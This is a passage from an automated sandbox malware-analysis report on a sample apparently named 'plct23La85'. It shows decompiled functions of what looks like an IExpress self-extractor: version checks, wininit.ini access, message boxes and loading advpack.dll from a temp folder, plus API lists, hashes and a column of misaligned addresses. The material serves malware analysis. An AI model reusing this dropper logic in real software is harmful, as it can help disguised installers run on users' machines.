                                                                                                                                                                                                      • Part of subcall function 0013468F: LockResource.KERNEL32(00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346D3
                                                                                                                                                                                                      • Part of subcall function 0013468F: memcpy_s.MSVCRT ref: 001346E5
                                                                                                                                                                                                      • Part of subcall function 0013468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001346EF
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00132F64,?,00000002,00000000), ref: 00133A5D
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00133AB3
                                                                                                                                                                                                      • Part of subcall function 001344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00134518
                                                                                                                                                                                                      • Part of subcall function 001344B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00134554
                                                                                                                                                                                                      • Part of subcall function 00136285: GetLastError.KERNEL32(00135BBC), ref: 00136285
                                                                                                                                                                                                    • lstrcmpA.KERNEL32(<None>,00000000), ref: 00133AD0
                                                                                                                                                                                                    • LocalFree.KERNEL32 ref: 00133B13
                                                                                                                                                                                                      • Part of subcall function 00136517: FindResourceA.KERNEL32(00130000,000007D6,00000005), ref: 0013652A
                                                                                                                                                                                                      • Part of subcall function 00136517: LoadResource.KERNEL32(00130000,00000000,?,?,00132EE8,00000000,001319E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00136538
                                                                                                                                                                                                      • Part of subcall function 00136517: DialogBoxIndirectParamA.USER32(00130000,00000000,00000547,001319E0,00000000), ref: 00136557
                                                                                                                                                                                                      • Part of subcall function 00136517: FreeResource.KERNEL32(00000000,?,?,00132EE8,00000000,001319E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00136560
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00133100,00000000,00000000), ref: 00133AF4
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                     • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                     • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                     • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                    • String ID: <None>$LICENSE
                                                                                                                                                                                                    • API String ID: 2414642746-383193767
                                                                                                                                                                                                    • Opcode ID: 97aa223d7682203e096634a44809fdec2183ad2ea209fc034a7ad9c4bd0dd8cb
                                                                                                                                                                                                    • Instruction ID: ef93b91d26bc6837027905b63b5437ce271e97740c1c6f401224febed300364f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 97aa223d7682203e096634a44809fdec2183ad2ea209fc034a7ad9c4bd0dd8cb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B9119370300201ABD724AF76AC09E177EB9EFE5750F10453EB586EB9A1DFB988409668
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                    			E001324E0(void* __ebx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t7;
                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                    				long _t26;
                                                                                                                                                                                                    				signed int _t27;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t20 = __ebx;
                                                                                                                                                                                                    				_t7 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                    				_t25 = 0x104;
                                                                                                                                                                                                    				_t26 = 0;
                                                                                                                                                                                                    				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                    					E0013658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                    					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                    					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                    					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                    						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                    						_lclose(_t25);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00136CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                    			}

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00132506
                                                                                                                                                                                                    • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0013252C
                                                                                                                                                                                                    • _lopen.KERNEL32 ref: 0013253B
                                                                                                                                                                                                    • _llseek.KERNEL32(00000000,00000000,00000002), ref: 0013254C
                                                                                                                                                                                                    • _lclose.KERNEL32(00000000), ref: 00132555
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                     • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                     • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                     • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                    • String ID: wininit.ini
                                                                                                                                                                                                    • API String ID: 3273605193-4206010578
                                                                                                                                                                                                    • Opcode ID: 276fe800d135a3e594c8e4f3544bc0ae327ea60ab2e61a73d1f6eadd7c933c34
                                                                                                                                                                                                    • Instruction ID: 73f12a66fd870ab7d6be5b9a9ff630f2b41368f61c421db5b0151c5b1ed6153b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 276fe800d135a3e594c8e4f3544bc0ae327ea60ab2e61a73d1f6eadd7c933c34
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6701D432600118ABC720AB65DC0CEDFBBBCEF95760F500165FA89D3190DF748E86CAA1
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                    			E001336EE(CHAR* __ecx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                    				signed int _v420;
                                                                                                                                                                                                    				signed int _v424;
                                                                                                                                                                                                    				CHAR* _v428;
                                                                                                                                                                                                    				CHAR* _v432;
                                                                                                                                                                                                    				signed int _v436;
                                                                                                                                                                                                    				CHAR* _v440;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t72;
                                                                                                                                                                                                    				CHAR* _t77;
                                                                                                                                                                                                    				CHAR* _t91;
                                                                                                                                                                                                    				CHAR* _t94;
                                                                                                                                                                                                    				int _t97;
                                                                                                                                                                                                    				CHAR* _t98;
                                                                                                                                                                                                    				signed char _t99;
                                                                                                                                                                                                    				CHAR* _t104;
                                                                                                                                                                                                    				signed short _t107;
                                                                                                                                                                                                    				signed int _t109;
                                                                                                                                                                                                    				short _t113;
                                                                                                                                                                                                    				void* _t114;
                                                                                                                                                                                                    				signed char _t115;
                                                                                                                                                                                                    				short _t119;
                                                                                                                                                                                                    				CHAR* _t123;
                                                                                                                                                                                                    				CHAR* _t124;
                                                                                                                                                                                                    				CHAR* _t129;
                                                                                                                                                                                                    				signed int _t131;
                                                                                                                                                                                                    				signed int _t132;
                                                                                                                                                                                                    				CHAR* _t135;
				CHAR* _t138;
				signed int _t139;

				_t72 =  *0x138004; // 0xe764604f
				_v8 = _t72 ^ _t139;
				_v416.dwOSVersionInfoSize = 0x94;
				_t115 = __ecx;
				_t135 = 0;
				_v432 = __ecx;
				_t138 = 0;
				if(GetVersionExA( &_v416) != 0) {
					_t133 = _v416.dwMajorVersion;
					_t119 = 2;
					_t77 = _v416.dwPlatformId - 1;
					__eflags = _t77;
					if(_t77 == 0) {
						_t119 = 0;
						__eflags = 1;
						 *0x138184 = 1;
						 *0x138180 = 1;
						L13:
						 *0x139a40 = _t119;
						L14:
						__eflags =  *0x138a34 - _t138; // 0x0
						if(__eflags != 0) {
							goto L66;
						}
						__eflags = _t115;
						if(_t115 == 0) {
							goto L66;
						}
						_v428 = _t135;
						__eflags = _t119;
						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
						_t11 =  &_v420;
						 *_t11 = _v420 & _t138;
						__eflags =  *_t11;
						_v440 = _t115;
						do {
							_v424 = _t135 * 0x18;
							_v436 = E00132A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
							_t91 = E00132A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
							_t123 = _v436;
							_t133 = 0x54d;
							__eflags = _t123;
							if(_t123 < 0) {
								L32:
								__eflags = _v420 - 1;
								if(_v420 == 1) {
									_t138 = 0x54c;
									L36:
									__eflags = _t138;
									if(_t138 != 0) {
										L40:
										__eflags = _t138 - _t133;
										if(_t138 == _t133) {
											L30:
											_v420 = _v420 & 0x00000000;
											_t115 = 0;
											_v436 = _v436 & 0x00000000;
											__eflags = _t138 - _t133;
											_t133 = _v432;
											if(__eflags != 0) {
												_t124 = _v440;
											} else {
												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
												_v420 =  &_v268;
											}
											__eflags = _t124;
											if(_t124 == 0) {
												_t135 = _v436;
											} else {
												_t99 = _t124[0x30];
												_t135 = _t124[0x34] + 0x84 + _t133;
												__eflags = _t99 & 0x00000001;
												if((_t99 & 0x00000001) == 0) {
													asm("sbb ebx, ebx");
													_t115 =  ~(_t99 & 2) & 0x00000101;
												} else {
													_t115 = 0x104;
												}
											}
											__eflags =  *0x138a38 & 0x00000001;
											if(( *0x138a38 & 0x00000001) != 0) {
												L64:
												_push(0);
												_push(0x30);
												_push(_v420);
												_push("nst0dum");
												goto L65;
											} else {
												__eflags = _t135;
												if(_t135 == 0) {
													goto L64;
												}
												__eflags =  *_t135;
												if( *_t135 == 0) {
													goto L64;
												}
												MessageBeep(0);
												_t94 = E0013681F(_t115);
												__eflags = _t94;
												if(_t94 == 0) {
													L57:
													0x180030 = 0x30;
													L58:
													_t97 = MessageBoxA(0, _t135, "nst0dum", 0x00180030 | _t115);
													__eflags = _t115 & 0x00000004;
													if((_t115 & 0x00000004) == 0) {
														__eflags = _t115 & 0x00000001;
														if((_t115 & 0x00000001) == 0) {
															goto L66;
														}
														__eflags = _t97 - 1;
														L62:
														if(__eflags == 0) {
															_t138 = 0;
														}
														goto L66;
													}
													__eflags = _t97 - 6;
													goto L62;
												}
												_t98 = E001367C9(_t124, _t124);
												__eflags = _t98;
												if(_t98 == 0) {
													goto L57;
												}
												goto L58;
											}
										}
										__eflags = _t138 - 0x54c;
										if(_t138 == 0x54c) {
											goto L30;
										}
										__eflags = _t138;
										if(_t138 == 0) {
											goto L66;
										}
										_t135 = 0;
										__eflags = 0;
										goto L44;
									}
									L37:
									_t129 = _v432;
									__eflags = _t129[0x7c];
									if(_t129[0x7c] == 0) {
										goto L66;
									}
									_t133 =  &_v268;
									_t104 = E001328E8(_t129,  &_v268, _t129,  &_v428);
									__eflags = _t104;
									if(_t104 != 0) {
										goto L66;
									}
									_t135 = _v428;
									_t133 = 0x54d;
									_t138 = 0x54d;
									goto L40;
								}
								goto L33;
							}
							__eflags = _t91;
                                                                                                                                                                                                    							if(_t91 > 0) {
                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags = _t123;
                                                                                                                                                                                                    							if(_t123 != 0) {
                                                                                                                                                                                                    								__eflags = _t91;
                                                                                                                                                                                                    								if(_t91 != 0) {
                                                                                                                                                                                                    									goto L37;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                    								L27:
                                                                                                                                                                                                    								if(__eflags <= 0) {
                                                                                                                                                                                                    									goto L37;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								L28:
                                                                                                                                                                                                    								__eflags = _t135;
                                                                                                                                                                                                    								if(_t135 == 0) {
                                                                                                                                                                                                    									goto L33;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t138 = 0x54c;
                                                                                                                                                                                                    								goto L30;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags = _t91;
                                                                                                                                                                                                    							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                    							if(_t91 != 0) {
                                                                                                                                                                                                    								_t131 = _v424;
                                                                                                                                                                                                    								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                    								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                    									goto L37;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								goto L28;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                    							_t109 = _v424;
                                                                                                                                                                                                    							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                    							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                    								goto L28;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                    							goto L27;
                                                                                                                                                                                                    							L33:
                                                                                                                                                                                                    							_t135 =  &(_t135[1]);
                                                                                                                                                                                                    							_v428 = _t135;
                                                                                                                                                                                                    							_v420 = _t135;
                                                                                                                                                                                                    							__eflags = _t135 - 2;
                                                                                                                                                                                                    						} while (_t135 < 2);
                                                                                                                                                                                                    						goto L36;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					__eflags = _t77 == 1;
                                                                                                                                                                                                    					if(_t77 == 1) {
                                                                                                                                                                                                    						 *0x139a40 = _t119;
                                                                                                                                                                                                    						 *0x138184 = 1;
                                                                                                                                                                                                    						 *0x138180 = 1;
                                                                                                                                                                                                    						__eflags = _t133 - 3;
                                                                                                                                                                                                    						if(_t133 > 3) {
                                                                                                                                                                                                    							__eflags = _t133 - 5;
                                                                                                                                                                                                    							if(_t133 < 5) {
                                                                                                                                                                                                    								goto L14;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t113 = 3;
                                                                                                                                                                                                    							_t119 = _t113;
                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t119 = 1;
                                                                                                                                                                                                    						_t114 = 3;
                                                                                                                                                                                                    						 *0x139a40 = 1;
                                                                                                                                                                                                    						__eflags = _t133 - _t114;
                                                                                                                                                                                                    						if(__eflags < 0) {
                                                                                                                                                                                                    							L9:
                                                                                                                                                                                                    							 *0x138184 = _t135;
                                                                                                                                                                                                    							 *0x138180 = _t135;
                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						if(__eflags != 0) {
                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                    						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L9;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t138 = 0x4ca;
                                                                                                                                                                                                    					goto L44;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t138 = 0x4b4;
                                                                                                                                                                                                    					L44:
                                                                                                                                                                                                    					_push(_t135);
                                                                                                                                                                                                    					_push(0x10);
                                                                                                                                                                                                    					_push(_t135);
                                                                                                                                                                                                    					_push(_t135);
                                                                                                                                                                                                    					L65:
                                                                                                                                                                                                    					_t133 = _t138;
                                                                                                                                                                                                    					E001344B9(0, _t138);
                                                                                                                                                                                                    					L66:
                                                                                                                                                                                                    					return E00136CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}

Instruction address column from the report (flattened by extraction; the line-by-line alignment with the decompiled code above is not recoverable here):
0x001336f9
0x00133700
0x0013370c
0x00133716
0x00133718
0x0013371b
0x00133721
0x0013372b
0x0013373d
0x00133745
0x00133746
0x00133746
0x00133749
0x001337ab
0x001337ad
0x001337ae
0x001337b3
0x001337b8
0x001337b8
0x001337bf
0x001337bf
0x001337c5
0x00000000
0x00000000
0x001337cb
0x001337cd
0x00000000
0x00000000
0x001337d5
0x001337db
0x001337e8
0x001337ea
0x001337ea
0x001337ea
0x001337f0
0x001337f6
0x00133805
0x00133817
0x0013382b
0x00133830
0x00133836
0x0013383b
0x0013383d
0x001338eb
0x001338eb
0x001338f2
0x0013390c
0x00133911
0x00133911
0x00133913
0x0013394d
                                                                                                                                                                                                    0x0013394d
                                                                                                                                                                                                    0x0013394f
                                                                                                                                                                                                    0x001338a9
                                                                                                                                                                                                    0x001338a9
                                                                                                                                                                                                    0x001338b0
                                                                                                                                                                                                    0x001338b2
                                                                                                                                                                                                    0x001338b9
                                                                                                                                                                                                    0x001338bb
                                                                                                                                                                                                    0x001338c1
                                                                                                                                                                                                    0x00133975
                                                                                                                                                                                                    0x001338c7
                                                                                                                                                                                                    0x001338de
                                                                                                                                                                                                    0x001338e0
                                                                                                                                                                                                    0x001338e0
                                                                                                                                                                                                    0x0013397b
                                                                                                                                                                                                    0x0013397d
                                                                                                                                                                                                    0x001339a9
                                                                                                                                                                                                    0x0013397f
                                                                                                                                                                                                    0x00133982
                                                                                                                                                                                                    0x0013398b
                                                                                                                                                                                                    0x0013398d
                                                                                                                                                                                                    0x0013398f
                                                                                                                                                                                                    0x0013399f
                                                                                                                                                                                                    0x001339a1
                                                                                                                                                                                                    0x00133991
                                                                                                                                                                                                    0x00133991
                                                                                                                                                                                                    0x00133991
                                                                                                                                                                                                    0x0013398f
                                                                                                                                                                                                    0x001339af
                                                                                                                                                                                                    0x001339b6
                                                                                                                                                                                                    0x00133a0f
                                                                                                                                                                                                    0x00133a0f
                                                                                                                                                                                                    0x00133a11
                                                                                                                                                                                                    0x00133a13
                                                                                                                                                                                                    0x00133a19
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001339b8
                                                                                                                                                                                                    0x001339b8
                                                                                                                                                                                                    0x001339ba
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001339bc
                                                                                                                                                                                                    0x001339bf
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001339c3
                                                                                                                                                                                                    0x001339c9
                                                                                                                                                                                                    0x001339ce
                                                                                                                                                                                                    0x001339d0
                                                                                                                                                                                                    0x001339e3
                                                                                                                                                                                                    0x001339e5
                                                                                                                                                                                                    0x001339e6
                                                                                                                                                                                                    0x001339f1
                                                                                                                                                                                                    0x001339f7
                                                                                                                                                                                                    0x001339fa
                                                                                                                                                                                                    0x00133a01
                                                                                                                                                                                                    0x00133a04
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133a06
                                                                                                                                                                                                    0x00133a09
                                                                                                                                                                                                    0x00133a09
                                                                                                                                                                                                    0x00133a0b
                                                                                                                                                                                                    0x00133a0b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133a09
                                                                                                                                                                                                    0x001339fc
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001339fc
                                                                                                                                                                                                    0x001339d3
                                                                                                                                                                                                    0x001339d8
                                                                                                                                                                                                    0x001339da
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001339dc
                                                                                                                                                                                                    0x001339b6
                                                                                                                                                                                                    0x00133955
                                                                                                                                                                                                    0x0013395b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133961
                                                                                                                                                                                                    0x00133963
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133969
                                                                                                                                                                                                    0x00133969
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133969
                                                                                                                                                                                                    0x00133915
                                                                                                                                                                                                    0x00133915
                                                                                                                                                                                                    0x0013391b
                                                                                                                                                                                                    0x0013391f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013392d
                                                                                                                                                                                                    0x00133933
                                                                                                                                                                                                    0x00133938
                                                                                                                                                                                                    0x0013393a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133940
                                                                                                                                                                                                    0x00133946
                                                                                                                                                                                                    0x0013394b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013394b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001338f2
                                                                                                                                                                                                    0x00133843
                                                                                                                                                                                                    0x00133845
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013384b
                                                                                                                                                                                                    0x0013384d
                                                                                                                                                                                                    0x00133883
                                                                                                                                                                                                    0x00133885
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013389a
                                                                                                                                                                                                    0x0013389e
                                                                                                                                                                                                    0x0013389e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001338a0
                                                                                                                                                                                                    0x001338a0
                                                                                                                                                                                                    0x001338a2
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001338a4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001338a4
                                                                                                                                                                                                    0x0013384f
                                                                                                                                                                                                    0x00133851
                                                                                                                                                                                                    0x00133857
                                                                                                                                                                                                    0x0013386e
0x00133877
0x0013387b
0x00000000
0x00000000
0x00000000
0x00133881
0x00133859
0x0013385c
0x00133862
0x00133866
0x00000000
0x00000000
0x00133868
0x00000000
0x001338f4
0x001338f4
0x001338f5
0x001338fb
0x00133901
0x00133901
0x00000000
0x0013390a
0x0013374b
0x0013374e
0x0013375c
0x00133764
0x00133769
0x0013376e
0x00133771
0x0013379c
0x0013379f
0x00000000
0x00000000
0x001337a3
0x001337a4
0x00000000
0x001337a4
0x00133773
0x00133777
0x00133778
0x0013377f
0x00133781
0x0013378e
0x0013378e
0x00133794
0x00000000
0x00133794
0x00133783
0x00000000
0x00000000
0x00133785
0x0013378c
0x00000000
0x00000000
0x00000000
0x0013378c
0x00133750
0x00000000
0x0013372d
0x0013372d
0x0013396b
0x0013396b
0x0013396c
0x0013396e
0x0013396f
0x00133a1e
0x00133a1e
0x00133a22
0x00133a27
0x00133a3e
0x00133a3e

APIs
• GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00133723
• MessageBeep.USER32(00000000), ref: 001339C3
• MessageBoxA.USER32(00000000,00000000,nst0dum,00000030), ref: 001339F1
Strings
Memory Dump Source
• Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
• Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
Similarity
• API ID: Message$BeepVersion
• String ID: 3$nst0dum
• API String ID: 2519184315-140149190
• Opcode ID: 129a6aa765b89fd7e186f8c9e86bfb65185a0b6a54239fd07d556c7d46e4f8e4
• Instruction ID: ed22d9c89406dd5cc49ccb064bca396376a3f06464ffdd0129e4b292961b51a1
• Opcode Fuzzy Hash: 129a6aa765b89fd7e186f8c9e86bfb65185a0b6a54239fd07d556c7d46e4f8e4
• Instruction Fuzzy Hash: 9491E271E012249FEB398F14CC81BAAB7B0AF45304F1541A9E9A9EB251DB708F81DB45
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 83%
E00136495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
	signed int _v8;                 // local copy of the stack security cookie
	char _v268;                     // path buffer, 0x104 (MAX_PATH) bytes
	void* __edi;
	signed int _t9;
	signed char _t14;               // result of GetFileAttributesA
	struct HINSTANCE__* _t15;       // module handle returned to the caller
	void* _t18;
	CHAR* _t26;                     // "advpack.dll"
	void* _t27;
	signed int _t28;

	_t27 = __esi;
	_t18 = __ebx;
	_t9 =  *0x138004; // 0xe764604f  global security cookie
	_v8 = _t9 ^ _t28;               // cookie XOR frame value: stack-protector prologue
	_push(__ecx);
	// Build "<extraction dir>\advpack.dll" in the local buffer: copy the temp
	// directory path, then append the DLL name.
	E00131781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
	_t26 = "advpack.dll";
	E0013658A( &_v268, 0x104, _t26);
	_t14 = GetFileAttributesA( &_v268);
	// INVALID_FILE_ATTRIBUTES (-1) or FILE_ATTRIBUTE_DIRECTORY (0x10): no such file,
	// so fall back to loading advpack.dll by bare name via the normal DLL search order.
	if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
		_t15 = LoadLibraryA(_t26);
	} else {
		// A file by that name exists in the temp extraction directory: load that copy
		// with LOAD_WITH_ALTERED_SEARCH_PATH (0x8), i.e. the local file wins over system paths.
		_t15 = LoadLibraryExA( &_v268, 0, 8);
	}
	// Epilogue: checks the stack cookie (_v8 ^ _t28) and returns the module handle.
	return E00136CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
}
0x00136495
0x00136495
0x001364a0
0x001364a7
0x001364ab
0x001364bd
0x001364c2
0x001364d3
0x001364df
0x001364e8
0x00136502
0x001364ee
0x001364f9
0x001364f9
0x00136516

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 001364DF
                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 001364F9
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 00136502
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
Similarity
• API ID: LibraryLoad$AttributesFile
• String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$advpack.dll
• API String ID: 438848745-179718922
• Opcode ID: 15c129d862528f9a5debb6e9b187f675461d5fea5d6e598d292d4196daaa85ef
